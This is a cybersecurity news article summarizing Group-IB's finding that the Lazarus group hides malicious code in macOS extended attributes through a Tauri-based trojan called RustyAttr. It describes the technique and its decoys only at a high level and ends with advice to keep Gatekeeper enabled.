A groundbreaking technique has been employed by the Lazarus Advanced Persistent Threat (APT) group to infiltrate macOS systems with malicious code, utilizing custom extended attributes. This innovative method, recently identified by Group-IB, allows the threat actor to evade traditional security measures, keeping the malicious code hidden and undetected.
Extended attributes, typically used for storing additional file metadata, are now being exploited by Lazarus to conceal and execute malware on targeted systems. This evolution in malware concealment marks a significant shift in the tactics used by cybercriminals. The group’s latest malware samples indicate that they are experimenting with extended attributes to avoid detection, reminiscent of a technique used in 2020 by the Bundlore adware, which concealed its payload in resource forks. However, Lazarus’s new approach leverages extended attributes, which are more versatile in modern macOS systems.
One of the malware variants developed by Lazarus is known as “RustyAttr,” a Trojan created using the Tauri framework. Tauri enables developers to build applications that combine a web frontend with a Rust backend, allowing for stealthy operation on macOS. By embedding malicious code within extended attributes and executing it using Tauri’s interface commands, Lazarus bypasses many antivirus protections. Notably, this malware remains undetected on VirusTotal.
In addition to utilizing extended attributes, Lazarus’s malware employs deceptive tactics to distract users and evade detection. The research conducted by Group-IB revealed that the malware includes decoy elements such as PDFs related to project development or cryptocurrency, as well as fake system messages. These decoys are designed to mislead users while the malware operates in the background, fetching additional malicious scripts from Lazarus’s command-and-control (C2) servers.
Key findings from Group-IB’s analysis include the use of extended attributes for code smuggling, the discovery of RustyAttr, a macOS trojan built with the Tauri framework, the deployment of fake decoys and dialogs to deceive users, and a moderate confidence level in attributing this activity to Lazarus.
While Apple’s Gatekeeper provides protection by preventing unsigned or unnotarized applications from running, users are reminded to exercise caution when downloading files from unfamiliar sources. Keeping Gatekeeper protections enabled is crucial, as disabling them may leave macOS systems vulnerable to attacks like those orchestrated by Lazarus.
Cybersecurity experts emphasize the importance of staying vigilant and avoiding interactions with suspicious files or prompts. By remaining cautious and maintaining security measures, users can mitigate the risk of falling victim to sophisticated malware attacks.